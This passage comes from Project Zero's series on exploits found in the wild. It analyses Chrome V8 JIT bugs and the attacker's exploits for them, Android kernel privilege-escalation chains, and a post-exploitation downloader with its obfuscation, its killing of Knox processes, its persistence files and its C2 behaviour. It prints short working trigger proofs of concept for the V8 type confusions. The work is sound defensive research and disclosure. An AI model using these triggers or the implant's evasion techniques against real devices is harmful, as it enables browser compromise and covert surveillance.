The general approach is similar, however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind as it’s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is using a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression gets translated into native code already in the constructor.

While it’s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue, for example, their trigger function is much more straightforward than in the public proof-of-concept.

2. CVE-2020-6418

The vulnerability

This is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:

'use strict';

(function() {

  var popped;

 

  function trigger(new_target) {

    function inner(new_target) {

      function constructor() {

        popped = Array.prototype.pop.call(array);

      }

      var temp = array[0];

      return Reflect.construct(constructor, arguments, new_target);

    }

 

    inner(new_target);

  }

 

  var array = new Array(0, 0, 0, 0, 0);

 

  for (var i = 0; i < 20000; i++) {

    trigger(function() { });

    array.push(0);

  }

 

  var proxy = new Proxy(Object, {

    get: () => (array[4] = 1.1, Object.prototype)

  });

 

  trigger(proxy);

  print(popped);

}());

A call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable meaning that it doesn’t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.

Note that the attacker can’t call the array function directly because for the expression array.pop() the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array.

This is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was reported to Chrome under the 7-day deadline. The one-line patch modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:

InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(

[...]

  InferReceiverMapsResult result = kReliableReceiverMaps;

[...]

    case IrOpcode::kJSCreate: {

      if (IsSame(receiver, effect)) {

        base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);

        if (initial_map.has_value()) {

          *maps_return = ZoneHandleSet<Map>(initial_map->object());

          return result;

        }

        // We reached the allocation of the {receiver}.

        return kNoReceiverMaps;

      }

+     result = kUnreliableReceiverMaps;  // JSCreate can have side-effect.

      break;

    }

[...]

The reader can refer to the blog post published by Exodus Intel for more details on the issue and their version of the exploit.

Exploit 1

This time there’s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.

The exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the “popped” value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.

The exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can “survive'' garbage collection. First, it acquires references to two other internal objects, the class_start_position and class_end_position private symbols, owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the “trustworthy” indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.

The obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.

Finally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.

The author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn’t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.

The exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:

jit_detector[Symbol.toPrimitive] = function() {

  var stack = (new Error).stack;

  if (stack.indexOf("Number (") == -1) {

    jit_detector.is_compiled = true;

  }

};

function trigger(array, proxy) {

  if (!jit_detector.is_compiled) {

    Number(jit_detector);

  }

[...]

During compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.

The exploit was broken in Chrome 64 by the change that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.

Exploit 2

After CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, another commit landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions. Therefore, the trigger function had to be updated:

function trigger(new_target) {

  function inner(new_target) {

    popped = array.pop(

        Reflect.construct(function() { }, arguments, new_target));

  }

 

  inner(new_target);

}

By making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.

The new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn’t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.

The exploit can’t modify the class body indices directly as they’re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.

This version targets Chrome 68-72. It was broken by the commit that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.

Exploit 3 & 4

The actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. That’s the only significant change made by the author.

Exploit 3 is the only one we’ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant amount of number and string literals got updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes.

The exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.

The public exploit presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn’t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the pointer compression feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.

3. CVE-2019-5782

The vulnerability

CVE-2019-5782 is an issue in TurboFan’s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues.

Note that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the previous post.

In this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:

oob_index = 100000;

 

function trigger() {

  let array = [1.1, 1.1];

 

  let index = arguments.length;

  index = index - 65534;

  index = Math.max(index, 0);

   

  return array[index] = 2.2;

}

 

for (let i = 0; i < 20000; i++) {

  trigger(1,2,3);

}

 

print(trigger.apply(null, new Array(65534 + oob_index)));

Qixun Zhao used the same vulnerability in Tianfu Cup and reported it to Chrome in November 2018. The public report includes a renderer exploit. The fix, which landed in Chrome 72, simply relaxed the range of the length property.

The exploit

The discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn’t rely on typed arrays to gain arbitrary read/write. The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It’s worth noting that this approach doesn’t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.

Interestingly, this is the only exploit that doesn’t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.

As the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that one of the hardening patches against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. The protection was soon turned off for desktop platforms and replaced with site isolation; hence, the public exploit, which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.

The public and private exploits have little in common apart from the bug itself and BCE technique, which has been commonly known since at least 2017. The public exploit turns out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.

4. CVE-2019-13764

This more complex typer issue occurs when TurboFan doesn’t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:

for (var i = -Infinity; i < 0; i += Infinity) { [...] }

This vulnerability and exploit for Chrome 73-79 have been discussed in detail in the previous blog post. There’s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.

The comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn’t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.

It’s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have “revived” the exploit for CVE-2019-5782.

Conclusion

The timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.

It is no secret that exploit reliability is a priority for high-tier attackers, but our findings  demonstrate the amount of resources the attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor has switched from an already high-quality 0-day to a slightly better vulnerability twice.

The area of JIT engine security has received great attention from the wider security community over the last few years. In 2015, when Chrome 37 came out, the exploit for CVE-2017-5070 would be considered quite ahead of its time. In contrast, if we don’t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 4: Android Exploits.

In-the-Wild Series: Android Exploits

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mark Brand, Project Zero

A survey of the exploitation techniques used by a high-tier attacker against Android devices in 2020

Introduction

After one of the Chrome exploits has been successful, there are several (quite simple) stages of payload decryption that occur. Once we've got through that, we reach a much more complex binary that is clearly the result of some engineering work. Thanks to that engineering it's very simple for us to locate and examine the exploits embedded inside! For each privilege elevation, they have a function in the .init_array which will register it into a global list which they later use -- this makes it easy for them to plug-and-play additional exploits into their framework, but is also very convenient for us when reverse-engineering their framework:



Each of the "xyz_register" functions looks like the following, adding an entry to the global list with a probe function used to check whether the device is vulnerable to the given exploit, and to estimate likelihood of success, and an exploit function used to launch the exploit. These probe functions are then used to dynamically determine the best exploit to use based on runtime information about the target device.

 

Looking at the probe functions gives us an idea of which devices are supported, but we can already see something fairly surprising: this attacker is using entirely public exploits for their privilege elevations. Of course, we can't tell for sure that they didn't know about any of these bugs prior to the original public disclosures; but their exploit configuration structure contains an internal "name" describing the exploit, and those map very neatly to either public naming ("iovy", "cow") or CVE numbers ("0569", "0820" for exploits targeting CVE-2015-0569 and CVE-2016-0820 respectively), suggesting that these exploits were very likely developed after those public disclosures and not before.

In addition, as we'll see below, most of the exploits are closely related to public exploits or descriptions of techniques used to exploit the bugs -- adding further weight to the theory that these exploits were implemented well after the original patches were shipped.

Of course, it's important to note that we had a narrow window of opportunity during which we were capturing these exploit chains, and it wasn't possible for us to exhaustively test with different devices and patch levels. It's entirely possible that this attacker also has access to Android 0-day privilege elevations, and we just failed to extract those from the server before being detected. Nonetheless, it's certainly an interesting data-point to see an attacker pairing a sophisticated 0-day exploit for Chrome with, well, a load of bugs patched between 2 and 5 years ago.

Anyway, without further ado let's take a look at the exploits they did fit in here!

Common Techniques

addr_limit pipe kernel read-write: By corrupting the addr_limit variable in the task_struct, this technique gives a user-mode process the ability to read and write arbitrary kernel memory by passing kernel pointers when reading to and writing from a pipe.

Userspace shellcode: PXN support on 32-bit Android devices is quite rare, so on most 32-bit devices it was/is still possible to directly execute shellcode from the user-mode portion of the address space. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

Point to userspace memory: PAN support is not ubiquitous on 64-bit Android devices, so it was (on older Android versions) often possible even on 64-bit devices for a kernel exploit to use this technique. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

iovy

The vulnerabilities:

CVE-2015-1805 is a vulnerability in the Linux kernel handling read/write for pipe iovectors, leading to the use of an out-of-bounds struct iovec.

CVE-2016-3809 is an information leak, disclosing the address of a kernel sock structure.

Strategy: Heap-spray with fake iovectors using sendmmsg, race write, readv and mmap/munmap to trigger the vulnerability. This produces a single-use kernel write-what-where.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then corrupt the socket member of the sock structure to point to userspace memory containing a fake structure (and function pointer table); execute userspace shellcode, elevating privileges.

Copy/Paste: ~90%. The exploit strategy is the same as public exploit code, and it looks like this was used as a starting point. The authors did some additional work, presumably to increase portability and stability, and the subsequent flow doesn't match any existing public exploit (that I found), but all of the techniques are publicly known.


Additional References: KEEN Lab "Talk is Cheap, Show Me the Code".

iovy_pxn2

The vulnerabilities: Same as iovy, plus:
P0-822 is an information leak, allowing the reading of arbitrary kernel memory.

Strategy: Same as above.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, and use P0-822 to leak the address of the function pointer table associated with the socket. Then use P0-822 again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~70%. The exploit strategy is the same as above, building the same primitive as the public exploit (addr_limit pipe kernel read-write). Instead of the public approach, they leverage the two additional vulnerabilities, which had public code available. It seems like the development of this exploit was copy/paste integration of the alternative memory-leak primitives, probably to increase portability. The code used for P0-822 is direct copy-paste (inner loop shown below).

iovy_pxn3

The vulnerabilities: Same as iovy.

Strategy: Heap-spray with pipe buffers. One thread each for read/write/readv/writev and the usual mmap/munmap thread. Modify all of the pipe buffers, and then run either "read and writev" or "write and readv" threads to get a reusable kernel read-write.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then use kernel-read to leak the address of the function pointer table associated with the socket. Use kernel-read again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~30%. The heap-spray technique is the same as another public exploit, but there is significant additional synchronization added to support multiple reads and writes. There's not really enough unique commonality to determine whether the authors started with that code as a reference or not.

0569

The vulnerability: According to the release notes, CVE-2015-0569 is a heap overflow in Qualcomm's wireless extension IOCTLs. This appears to be where the exploit name is derived from; however as you can see at the Qualcomm advisory, there were actually 15 commits here under 3 CVEs, and the exploit appears to actually target one of the stack overflows, which was patched as CVE-2015-0570.

Strategy: Corrupt return address; return to userspace shellcode.

Subsequent flow: The shellcode corrupts addr_limit, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: 0%. This bug is trivial to exploit for non-PXN targets, so there would be little to gain by borrowing code.

Additional References: KEEN Lab "Rooting every Android".

0820

The vulnerability: CVE-2016-0820, a linear data-section overflow resulting from a lack of bounds checking.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the KEEN Lab presentation.

Copy/Paste: ~20%. The only public code we could find for this is the PoC attached to our bugtracker - it seems most likely that this was an independent implementation written after KEEN lab's presentation and based on their description.

Additional References: KEEN Lab "Rooting every Android".

COW

The vulnerability: CVE-2016-5195, also known as DirtyCOW.

Strategy: Depending on the system configuration their exploit will choose between using /proc/self/mem or ptrace for the write thread.

Subsequent flow: There are several different exploitation strategies depending on the target environment, and the full exploitation process here is a fairly complex state-machine involving several hops into different processes, which is likely necessary to support launching the exploit from within an isolated app context.

Copy/Paste: ~5%. The basic code necessary to exploit CVE-2016-5195 was probably copied from one of the many public sources, but the majority of the complexity here is in what is done next, and this doesn't seem to be similar to any of the public Android exploits.

9568

The vulnerability: CVE-2018-9568, also known as WrongZone.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the Baidu Security Lab blog post.

Copy/Paste: ~20%. The code doesn't seem to match the publicly available exploit code for this bug, and it seems most likely that this was an independent implementation written after Baidu's blog post and based on their description.

Additional References: Alibaba Security "From Zero to Root". 
Baidu Security Lab: "KARMA shows you offense and defense".

Conclusion

Nothing very interesting, which is interesting in itself!

Here is an attacker who has access to 0day vulnerabilities in Chrome and Windows, and the ability to develop new and very reliable exploitation techniques in order to exploit these vulnerabilities -- and yet their Android privilege elevation capabilities appear to consist entirely of exploits using public, documented techniques and n-day vulnerabilities.

It certainly seems like they have the capability to write Android exploits. The exploits seem to be based on publicly available source code, and their implementations are based on exploitation strategies described in public sources.

One explanation for this would be that they serve different payloads depending on the targeting, and we were only receiving a "low-value" privilege-elevation capability. Alternatively,  perhaps exploit server URLs that we had access to were specifically configured for a user that they know uses an older device that would be vulnerable to one of these exploits?

Based on all the information available, it's likely that they have more device-specific 0day exploits. We might just not have tested with a device/firmware version that they supported for those exploits and inadvertently missed their more modern exploits.

About the only solid conclusion that we can make is that attackers clearly still see value in developing and maintaining exploits for fairly old Android vulnerabilities, to the extent of supporting those devices long past when their original manufacturers provide support for them.

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 5: Android Post-Exploitation.

In-the-Wild Series: Android Post-Exploitation

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Maddie Stone, Project Zero

A deep-dive into the implant used by a high-tier attacker against Android devices in 2020

Introduction

This post covers what happens once the Android device has been successfully rooted by one of the exploits described in the previous post. What’s especially notable is that while the exploit chain only used known, and some quite old, n-day exploits, the subsequent code is extremely well-engineered and thorough. This leads us to believe that the choice to use n-days is likely not due to a lack of technical expertise.

This post describes what happens post-exploitation of the exploit chain. For this post, I will be calling different portions of the exploit chain as “stage X”. These stage numbers refer to:

  • Stage 1: Chrome renderer exploit
  • Stage 2: Android privilege escalation exploit
  • Stage 3: Post-exploitation downloader ← *described in this post!*
  • Stage 4: Implant

This post details stage 3, the code that runs post exploitation. Stage 3 is an ARM ELF file that expects to run as root. This stage 3 ELF is embedded in the stage 2 binary in the data section. Stage 3 is a downloader for stage 4.

As stated at the beginning, this stage, stage 3,  is a very well-engineered piece of software. It is very thorough in its methods to hide its behavior and ensure that it is running on the correct targeted device. Stage 3 includes obfuscation, many anti-analysis checks, detailed logging, command and control (C2) server communications, and ultimately, the downloading and executing of Stage 4. Based on the size and modularity of the code, it seems likely that it was developed by a team rather than a single individual.

So let’s get into the fun!

Execution

Once stage 2 has successfully rooted the device and modified different security settings, it loads stage 3. Stage 3 is embedded in the data section of stage 2 and is 0x436C bytes in size. Stage 2 includes a variety of different methods to load the stage 3 ELF including writing it to /proc/self/mem. Once one of these methods is successful, execution transfers to stage 3.

This stage 3 ELF exports two functions: init and d. init is the function called by stage 2 to begin execution of stage 3. However, the main functionality for this binary is not in this function. Instead it is in two functions that are referenced by the ELF’s .init_array. The first function ensures that the environment variables PATH, ANDROID_DATA, and ANDROID_ROOT are set to expected values. The second function spawns a new thread that runs the heavy lifting of the behavior of the binary. The init function simply calls pthread_join on the thread spawned by the second function in the .init_array so it will wait for that thread to terminate.

In the newly spawned thread, first, it cleans up from the previous stage by deleting most of the environment variables that stage 2 set. Then it will kill any processes that include the word “knox” in the cmdline. Knox is a security platform that is built into Samsung devices. 

Next, the code will check how often this binary has been running by reading a file that it drops on the device called state.parcel. The execution proceeds normally as long as it hasn’t been run more than 6 times on the current day. In other cases, execution changes as described in the state.parcel file section. 

The binary will then iterate through the process’s open file descriptors 0-2 (usually stdin, stdout, and stderr) and points them to /dev/null. This will prevent output messages from appearing which may lead a user or others to detect the presence of the exploit chain. The code will then iterate through any other open file descriptors (/proc/self/fd/) for the process and close any that include “pipe:” or “anon_inode:” in their symlinks.  It will also close any file descriptors with a number greater than 32 that include “socket:” in the link and any that don’t include /data/dalvik-cache/arm or /dev/ in the name. This may be to prevent debugging or to reduce accidental damage to the rest of the system.

The thread will then call into the function that includes significant functionality for the main behavior of the binary. It decrypts data, sets up configuration data, performs anti-analysis and debugging checks, and finally contacts the C2 server to download the next stage and executes it. This can be considered the main control loop for Stage 3.

The rest of this post explains the technical details of the Stage 3 binary’s behavior, categorized.

Obfuscation

Stage 3 uses quite a few different layers of obfuscation to hide the behavior of the code. It uses a similar string obfuscation technique to stage 2. Another way that the binary obfuscates its behavior is that it uses a hash table to store dynamic configuration settings/status. Instead of using a descriptive string for the “key”, it uses a series of 16 AES-decrypted bytes as the “keys” that are passed to the hashing function.The binary encrypts its static configuration settings, communications with the C2, and a hash table that stores dynamic configuration setting with AES. The state.parcel file that is saved on the device is XOR encoded. The binary also includes multiple techniques to make it harder to understand the behavior of the device using dynamic analysis techniques. For example, it monitors what is mapped into the process’s memory, what file descriptors it has opened, and sends very detailed information to the C2 server.

Similar to the previous stages, Stage 3 seems to be well engineered with a variety of different techniques to make it more difficult for an analyst to determine its behavior, either statically or dynamically. The rest of this section will detail some of the different techniques.

String Obfuscation

The vast majority of the strings within the binary are obfuscated. The obfuscation method is very similar to that used in previous stages. The obfuscated string is passed to a deobfuscation function prior to use. The obfuscated strings are designated by 0x7E7E7E (“~~~”) at the end of the string. To deobfuscate these strings, we used an IDAPython script using flare_emu that emulated the behavior of the deobfuscation function on each string.

Configuration Settings Decryption

A data block within the binary, containing important configuration settings, is encrypted using AES256. It is decrypted upon entrance to the main control function. The decrypted contents are written back to the same location in memory where the encrypted contents were. The code uses OpenSSL to perform the AES256 decryption. The key and the IV are hardcoded into the binary.

Whenever this blog post refers to the “decrypted data block”, we mean this block of memory. The decrypted data includes things such as the C2 server url, the user-agent to use when contacting the C2 server, version information and more. Prior to returning from the main control function, the code will overwrite the decrypted data block to all zeros. This makes it more difficult for an analyst to dump the decrypted memory.

Once the decryption is completed, the code double checks that decryption was successful by looking at certain bytes and verifying their values. If any of these checks fail, the binary will not proceed with contacting the C2 server and downloading stage 4.

Hashtable Encryption

Another block of data that is 0x140 bytes long is then decrypted in the same way. This decrypted data doesn’t include any human-readable strings, but is instead used as “keys” for a hash table that stores configuration settings and status information. We’ll call this area the “decrypted keys block”. The information that is stored in the hash table can change whereas the configuration settings in the decrypted data block above are expected to stay the same throughout execution. The decrypted keys block, which serves as the hash table keys, is shown below.

00000000: 9669 d307 1994 4529 7b07 183e 1e0c 6225  .i....E){..>..b%

00000010: 335f 0f6e 3e41 1eca 1537 3552 188f 932d  3_.n>A...75R...-

00000020: 4bf4 79a4 c5fd 0408 49f4 b412 3fa3 ad23  K.y.....I...?..#

00000030: 837b 5af1 2862 15d9 be29 fd62 605c 6aca  .{Z.(b...).b`\j.

00000040: ad5a dd9c 4548 ca3a 7683 5753 7fb9 970a  .Z..EH.:v.WS....

00000050: fe71 a43d 78b1 72f5 c8d4 b8a4 0c9e 925c  .q.=x.r........\

00000060: d068 f985 2446 136c 5cb0 d155 ad8d 448e  .h..$F.l\..U..D.

00000070: 9307 54ba fc2d 8b72 ba4d 63b8 3109 67c9  ..T..-.r.Mc.1.g.

00000080: e001 77e2 99e8 add2 2f45 1504 557f 9177  ..w...../E..U..w

00000090: 9950 9f98 91e6 551b 6557 9c62 fea8 afef  .P....U.eW.b....

000000a0: 18b8 8043 9071 0f10 38aa e881 9e84 e541  ...C.q..8......A

000000b0: 3fa0 4697 187f fb47 bbe4 6a76 fa4b 5875  ?.F....G..jv.KXu

000000c0: 04d1 2861 6318 69bd 7459 b48c b541 3323  ..(ac.i.tY...A3#

000000d0: 16cd c514 5c7f db99 96d9 5982 f6f1 88ee  ....\.....Y.....

000000e0: f830 fb10 8192 2fea a308 9998 2e0c b798  .0..../.........

000000f0: 367f 7dde 0c95 8c38 8cf3 4dcd acc4 3cd3  6.}....8..M...<.

00000100: 4473 9877 10c8 68e0 1673 b0ad d9cd 085d  Ds.w..h..s.....]

00000110: ab1c ad6f 049d d2d4 65d0 1905 c640 9f61  [email protected]

00000120: 1357 eb9a 3238 74bf ea2d 97e4 a747 d7b6  .W..28t..-...G..

00000130: fd6d 8493 2429 899d c05d 5b94 0096 4593  .m..$)...][...E.

The binary uses this hash table to keep track of important values such as for status and configuration. The code initializes a CRC table which is used in the hashing algorithm and then the hash table is initialized. The structure that manages the hashtable shown below:

struct hashtable_mgr {

    int * hashtable_ptr;

    int maxEntries;

    int numEntries;

}

The first member of this struct points to the hash table which is allocated on the heap and has size 0x1400 bytes when it’s first initialized. The hash table uses sets of 0x10 bytes from the decrypted keys block as the key that gets passed to the hashing function.

There are two main functions that are used to interact with this hashtable throughout the binary: we’ll call them getValueFromHashtable and putValueInHashtable. Both functions take four arguments: pointer to the hashtable manager, pointer to the key (usually represented as an offset from the beginning of the decrypted keys block), a pointer for the value, and an int for the value length. Through the rest of this post, I will refer to values that are stored in the hash table. Because the key is a series of 0x10 bytes, I will refer to values as “the value for offset 0x20 in the hash table”. This means the value that is stored in the hashtable for the “key” that is 0x10 bytes and begins at the address of the start of the decrypted keys block + 0x20.

Each entry in the hashtable has the following structure.

struct hashtable_entry {

    BYTE * key_ptr;

    uint key_len;

    uint in_use;

    BYTE * value_ptr;

    uint value_len;

};

I have documented the majority of the entries in the hashtable here. I use the key’s offset from the beginning of the decrypted keys block as the “key” instead of typing out the series of 0x10 bytes. As shown in the linked sheet, the hashtable contains the dynamic variables that stage 3 needs to keep track of. For example, the filename where to save stage 4 and the install and failure counts.

The hashtable is periodically written to a file named uierrors.txt as described in the Persistence section. This is to save state in case the process exits.

Persistence

The whole exploit chain diligently cleans up after itself to leave as few indicators as possible of its presence. However, stage 3 does save a couple of files and adds environment variables in order to function. This is in addition to the stage 4 code which will be discussed in the “Executing the Next Stage” section. Each of the files and variables described in this section will be deleted as soon as they’re no longer needed, but they will be on a device for at least a period of time. For each of the files that are saved to the device, the directory path is often randomly selected from a set of potential paths. This makes it more time consuming for an analyst to detect the presence of the file on a device because the analyst would have to check 5 different paths for each file rather than 1.

state.parcel File

During startup, the code will record the current time in a file named state.parcel. After it records the current time at the beginning of the file, it will then check how many times per day this has been done by reading all of the times currently in the file. If there are less than 6 entries for the current day, the code proceeds. If there are 6 entries in the file from the current day and there are at least 5 entries for each of the previous 3 days, the binary will set a variable that will tell the code to clean up and exit. If there are 6 entries for the current day and there’s at least one entry for each of the past 3 days, the binary will clean up the persistent files for both this and other stages and then do a max sleep: sleep(0xFFFFFFFF), which is the equivalent of sleeping for over 136 years.

If the effective UID is 0 (root), then the code will randomly choose one of the following paths to write the file to:

  • /data/backup/
  • /data/data/
  • /data/
  • /data/local/
  • /data/local/tmp/

If the effective UID is not 0, then the state.parcel file will be written to whatever directory the binary is executing out of according to /proc/self/exe. The contents in state.parcel are obfuscated by XOR’ing each entry with 0xFF12EE34.

uierrors.txt - Hash table contents

Stage 3 periodically writes the hash table that contains configuration and static information to a file named uierrors.txt. The code uses the same process as for state.parcel to decide which directory to write the file too.

Whenever the hashtable is written to uierrors.txt it is encrypted using AES256. The key is the same AES key used to decrypt the configuration settings data block, but it generates a set of 0x10 random bytes to use as the IV. The IV is written to the uierrors.txt file first and then is followed by the encrypted hash table contents. The CRC32 of the encrypted contents of the file is written to the file as the last 4 bytes.

Environment Variables

On start-up, stage 3 will remove the majority of the environment variables set by the previous stage. It then sets its own new environment variables.

Environment Variable Name

Value

abc

Address of the decryption data block

def

Address of the function that will send logging messages to the C2 server

def2

Address of the function that adds logging messages to the error and/or informational logging message queues

ghi

Points the the decrypted block of hashtable keys

ddd

Address of the function that performs inflate (decompress)

ccc

Address of the function that performs deflate (compress)

0x10 bytes at 0x228CC

???

0x10 bytes at 0x228DC

Pointer to the string representation of the hex_d_uuid

0x10 bytes at 0x228F0

Pointer to the C2 domain URL

0x10 bytes at 0x22904

Pointer to the port string for the C2 server

0x10 bytes at 0x22918

Pointer to the beginning of the certificate

0x10 bytes at 0x2292C

0x1000

0x10 bytes at 0x22940

Pointer to +4AA in decrypted data block

0x10 bytes at 0x22954

0x14

0x10 bytes at 0x22698

